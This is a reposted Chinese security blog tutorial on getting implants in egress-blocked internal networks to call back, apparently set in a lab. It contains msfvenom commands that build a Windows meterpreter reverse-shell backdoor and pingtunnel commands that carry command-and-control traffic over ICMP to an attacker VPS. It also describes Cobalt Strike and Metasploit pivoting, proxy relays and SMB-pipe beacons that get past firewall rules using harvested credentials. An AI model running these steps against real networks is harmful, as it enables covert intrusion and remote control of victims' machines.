内网渗透-不出网上线学习研究

admin 2024年3月26日22:59:21评论4 views字数 2174阅读7分14秒阅读模式

朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把“亿人安全设为星标”,否则可能就看不到了啦

原文链接:

https://xz.aliyun.com/t/13918

引言

在网络安全领域,内网不出网是一个常见问题,它可能由于网络协议封杀或者内网完全无网络连接造成。本文将介绍隧道技术和代理技术,以及如何在不同情况下应用这些技术来解决问题。

在解决内网不出网的时候我们首先应该要了解隧道技术和代理技术

隧道技术

隧道技术是一种在网络中创建私密通道以在不安全或公共网络上安全传输数据的方法。它允许将一种网络协议的数据封装在另一种网络协议的数据包中传输。

代理技术

  • 代理是一种在网络中充当中间人的服务器或服务。它接收来自客户端的请求,并代表客户端向其他服务器或资源发出请求。代理服务器接收到请求后,可以修改请求或者在返回给客户端之前对其进行处理。

代理技术和隧道技术的区别

代理和隧道技术都可以用于安全性和访问控制,但它们的主要区别在于其作用和实现方式。代理更多地用于代表客户端请求资源,而隧道技术用于在网络中创建安全通道传输数据。

所以我们在内网协议被封杀的时候使用隧道技术。网络通信不通的时候使用代理技术

案例分析:

1.协议被封杀

今天列举的是tcp协议被封杀导致无法出网

msf绕过

首先生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=444 -f exe > msf.exe

然后msf启动监听,监听333端口

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

kali使用pingtunnel工具开启隧道服务:./pingtunnel -type server

windows开启隧道将本地444端口icmp协议数据转发到攻击机IP的333端口上

pingtunnel.exe -type client -l 127.0.0.1:444 -s 192.168.4.1(kali) -t 192.168.4.1:333 -tcp 1 -noprint 1 -nolog 1

CS绕过

内网渗透-不出网上线学习研究

然后使用icmp1生成后门程序

kali使用pingtunnel工具开启隧道服务:./pingtunnel -type server

windows开启隧道将本地5555端口icmp协议数据转发到攻击机IP的6666端口上

pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.4.1(kali) -t vps地址:6666 -tcp 1 -noprint 1 -nolog 1

2.完全没有网络

内网环境

内网渗透-不出网上线学习研究

CS上线

第一步;先获取到web主机的权限(就是常规的web渗透拿到主机权限,这里就不演示了)

内网渗透-不出网上线学习研究

第二步:vps主机无法直接跟用户主机进行通讯,所以我们在win7上生成一个本地后门,然后通过web服务器进行上线

内网渗透-不出网上线学习研究

将2222的监听器生成后门程序,上传至用户主机执行

然后进web服务器会话交换,连接用户主机的2222端口

内网渗透-不出网上线学习研究

主机成功上线

内网渗透-不出网上线学习研究

MSF上线

同样要先拿到web服务器的权限,然后添加路由

内网渗透-不出网上线学习研究

生成后门,后门的连接地址0.0.0.0或127.0.0.1都行

内网渗透-不出网上线学习研究

将后门上传到用户主机执行

kali开启监听

内网渗透-不出网上线学习研究

成功上线

内网渗透-不出网上线学习研究

三层内网也是一样的
先添加路由

内网渗透-不出网上线学习研究

然后开启代理转发

内网渗透-不出网上线学习研究

设置代理

内网渗透-不出网上线学习研究

内网渗透-不出网上线学习研究

主机不出网,并且还有防火墙限制的情况怎么上线

内网渗透-不出网上线学习研究

这就要先说下正向连接和反向连接了

正向连接

作用:正向连接是指从客户端到服务器或目标系统的连接。在网络安全中,正向连接是常见的、允许的连接方式,允许用户或系统通过网络与其他系统或服务进行通信和交互。
使用场景:正向连接是网络中常见的连接形式,例如,当用户通过浏览器连接到网站、设备连接到服务器或者两个设备之间建立直接通信时,都属于正向连接。

内网渗透-不出网上线学习研究

反向连接

作用:反向连接是指从服务器或目标系统到客户端或其他系统的连接。在网络安全中,反向连接可能是不寻常的,因为它可以表示潜在的安全风险,如恶意软件或攻击者通过网络建立的连接。
使用场景:反向连接可能由恶意软件、僵尸网络(botnets)或黑客攻击中的后门程序使用。这种连接方式允许攻击者在远程控制系统或服务器,进行未经授权的操作或数据传输,而不被目标系统的防御机制察觉。

内网渗透-不出网上线学习研究

代理上线

知道了正向和反向连接我们开始绕过防火墙上线

windows_server2008和win7的上线就按上面说的方法正常上线就行,接下来上线win10

因为正向连接受到防火墙的限制,我们尝试反向连接,但是win10目前只有win7可以通信,所以我们用win7来转发上线

内网渗透-不出网上线学习研究

内网渗透-不出网上线学习研究

随后就会生成一个反向连接的监听器,将监听器上传到win10执行

内网渗透-不出网上线学习研究

执行后门,成功上线

内网渗透-不出网上线学习研究

内网渗透-不出网上线学习研究

SMB管道

接下来windows_server2016上线
因为win10做了入站规则,所以反向连接给win10,win10就会拒绝
直接选择正向硬刚防火墙正向规则,因为正向规则只允许访问打印机,也就是smb服务,文件共享协议
我们建立一个smb管道来进行上线

新建一个smb管道

内网渗透-不出网上线学习研究

内网渗透-不出网上线学习研究

使用可通信主机进行端口扫描

内网渗透-不出网上线学习研究

内网渗透-不出网上线学习研究

找到扫描出来的主机

内网渗透-不出网上线学习研究

内网渗透-不出网上线学习研究

账号密码都是前期收集到的信息。注:==没有账号密码无法利用==

监听器选择刚生成的smb管道,会话选择win10(能通信的网段主机)的

内网渗透-不出网上线学习研究

成功上线

原文始发于微信公众号(亿人安全):内网渗透-不出网上线学习研究

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月26日22:59:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透-不出网上线学习研究http://cn-sec.com/archives/2604992.html

发表评论

匿名网友 填写信息